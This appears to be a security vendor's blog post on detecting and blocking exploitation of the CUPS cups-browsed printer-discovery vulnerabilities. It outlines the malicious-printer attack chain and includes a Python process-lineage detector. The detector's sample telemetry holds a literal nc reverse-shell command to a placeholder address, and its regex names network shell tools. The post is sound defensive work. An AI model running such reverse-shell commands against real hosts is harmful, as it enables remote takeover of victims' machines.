A series of critical-severity bugs in the CUPS printer discovery mechanism (cups-browsed) affecting Linux hosts was recently disclosed. The vulnerabilities can be chained to install a malicious printer automatically and achieve unauthenticated remote code execution. Details of the vulnerabilities, as well as exploit code, are already public. Uptycs released details about the vulnerabilities here.
In this blog we show how Uptycs detects and remediates exploitation attempts against a vulnerable machine.
For the purpose of exploitation, we used this PoC.
From the attacker machine, we run the exploit script to advertise our malicious printer, named “BestPrinter”, whose print command runs nc to spawn a reverse shell, as shown in the image below.
The command sends a multicast DNS (mDNS) packet advertising the malicious printer, which cups-browsed on the victim picks up.
On the victim machine, when we try to print a page from Firefox, the malicious printer appears in the printer list.
In the background, the victim host sends an IPP (Internet Printing Protocol) request to fetch the printer's attributes. The exploit script answers with a crafted IPP response carrying the exploit command in the “FoomaticRIPCommandLine” attribute. cups-browsed writes the returned attributes into a temporary PPD (PostScript Printer Description) file for the new printer, and that PPD tells CUPS to run the foomatic-rip filter, which passes the FoomaticRIPCommandLine value to a shell, whenever a print job is sent to this printer.
Fig 3. IPP request and response containing exploit command
The victim has to click the “Print” button to trigger the exploit; nothing runs until a job is actually sent to the printer.
The exploit runs successfully and spawns a reverse shell. From there we run further commands to gather system information, set cron jobs for persistence, and deploy a coin miner.
Uptycs automatically scans the entire infrastructure (hosts, containers, images and Lambda functions) for affected assets and surfaces them on a dashboard.
Fig 6. Trending Vulnerabilities
You can get a detailed vulnerability report by clicking into the vulnerability.
Fig 7. Vulnerability Scan Report for CUPS CVEs.
Vulnerabilities are prioritized by evaluating the environment in which each one is found: whether the asset is exposed to the internet, whether a process from the vulnerable package is currently running, and whether that process runs with elevated privileges. The mere presence of a vulnerable package ranks lower than a running process from that package, which in turn ranks higher again if it runs as a privileged user. If the asset is exposed to the internet (receiving inbound connections from public IP addresses), the priority is raised further.
Uptycs does not stop at detecting the vulnerability; it also protects customers' infrastructure against attackers who exploit it.
Uptycs detects exploitation activity and protects the host. In Protect mode it blocks the attack at its first stage by killing the malicious process launched by the attacker, before the target machine is compromised. In Detect mode the exploitation is not blocked, but every action of the attacker is alerted on and deep telemetry is collected so investigators can conduct forensics.
When Uptycs is configured in Protect mode, the attack is stopped at the point where the exploit's command line spawns the reverse shell.
When we performed the attack in Detect mode, we see the full attack chain: the foomatic-rip process, whose parent is cupsd, launches bash to run the reverse shell, and the cron persistence and coin-miner deployment follow from that shell.
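The lineage above is what a detection should key on. The following is an added example (not Uptycs detection logic) that walks a constructed set of process records, finds foomatic-rip filters started by cupsd, and alerts when a reverse-shell indicator appears in a descendant's command line, returning the process subtree a Protect-style response would kill. A benign foomatic-rip job that pipes Ghostscript into a rasterizer is included to show why "shell under foomatic-rip" alone is not a signal: foomatic-rip always runs its command line through sh. The record shape, pids and addresses are assumptions.

```python
"""Find CUPS filter processes that spawned a reverse shell, from process telemetry.

Added example for this post (not Uptycs code). Records use the constructed shape
{pid, ppid, exe, cmdline, user}; real EDR/osquery schemas differ.
"""
import re
from typing import Dict, List

# Command-line indicators of a reverse shell.
REVSHELL = re.compile(
    r"/dev/tcp/"                                                # bash /dev/tcp redirect
    r"|\b(?:nc|ncat|netcat|socat)\b.*(?:\s-e\s|\s-c\s|exec:)"   # nc -e / socat exec:
    r"|\bbash\s+-i\b"                                           # interactive bash
)


def ancestry(procs: Dict[int, dict], pid: int) -> List[dict]:
    """Process chain from the root ancestor down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    chain.reverse()
    return chain


def detect_cups_reverse_shell(events: List[dict]) -> List[dict]:
    """One alert per cupsd -> foomatic-rip filter with a reverse shell beneath it."""
    procs = {e["pid"]: e for e in events}
    alerts: Dict[int, dict] = {}
    for e in sorted(events, key=lambda p: p["pid"]):
        chain = ancestry(procs, e["pid"])
        names = [p["exe"] for p in chain]
        if "foomatic-rip" not in names:
            continue
        i = names.index("foomatic-rip")
        # A filter not started by cupsd is some other use of foomatic-rip; out of scope.
        if i == 0 or names[i - 1] != "cupsd":
            continue
        filter_pid = chain[i]["pid"]
        if filter_pid in alerts or not REVSHELL.search(e["cmdline"]):
            continue
        # Everything at or below the triggering process is the attacker's tree.
        tree = [p["pid"] for p in events
                if any(a["pid"] == e["pid"] for a in ancestry(procs, p["pid"]))]
        alerts[filter_pid] = {
            "filter_pid": filter_pid,
            "trigger_pid": e["pid"],
            "user": e["user"],
            "chain": names,
            "kill_pids": tree,
        }
    return list(alerts.values())


# Constructed telemetry: one benign print job and one job from the malicious PPD.
EVENTS = [
    {"pid": 1, "ppid": 0, "exe": "systemd", "cmdline": "/sbin/init", "user": "root"},
    {"pid": 800, "ppid": 1, "exe": "cupsd", "cmdline": "/usr/sbin/cupsd -l", "user": "root"},
    # Benign job: the driver's command line pipes Ghostscript into a rasterizer.
    {"pid": 2000, "ppid": 800, "exe": "foomatic-rip", "cmdline": "foomatic-rip 12 lp Example 1", "user": "lp"},
    {"pid": 2001, "ppid": 2000, "exe": "sh",
     "cmdline": "sh -c gs -q -dBATCH -sDEVICE=ppmraw -sOutputFile=- - | pnm2ppa -v 710", "user": "lp"},
    {"pid": 2002, "ppid": 2001, "exe": "gs", "cmdline": "gs -q -dBATCH -sDEVICE=ppmraw -sOutputFile=- -", "user": "lp"},
    # Malicious job: the PPD's FoomaticRIPCommandLine was an nc reverse shell.
    {"pid": 2100, "ppid": 800, "exe": "foomatic-rip", "cmdline": "foomatic-rip 13 lp BestPrinter 1", "user": "lp"},
    {"pid": 2101, "ppid": 2100, "exe": "sh", "cmdline": "sh -c nc 192.0.2.10 4444 -e /bin/bash", "user": "lp"},
    {"pid": 2102, "ppid": 2101, "exe": "nc", "cmdline": "nc 192.0.2.10 4444 -e /bin/bash", "user": "lp"},
    {"pid": 2103, "ppid": 2102, "exe": "bash", "cmdline": "/bin/bash", "user": "lp"},
    {"pid": 2104, "ppid": 2103, "exe": "crontab", "cmdline": "crontab -", "user": "lp"},
]

if __name__ == "__main__":
    for alert in detect_cups_reverse_shell(EVENTS):
        print(" -> ".join(alert["chain"]), "kill:", alert["kill_pids"])
```

The alert carries the whole subtree under the triggering shell rather than just the nc process, because by the time a detection fires the reverse shell may already have spawned the cron and miner children seen in the Detect-mode chain; killing only the shell leaves those running.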
The Uptycs team is ready to help. If you would like to learn more about the Uptycs Platform, speak to one of our experts, and see a demo of how to investigate and remediate issues like this one contact us today.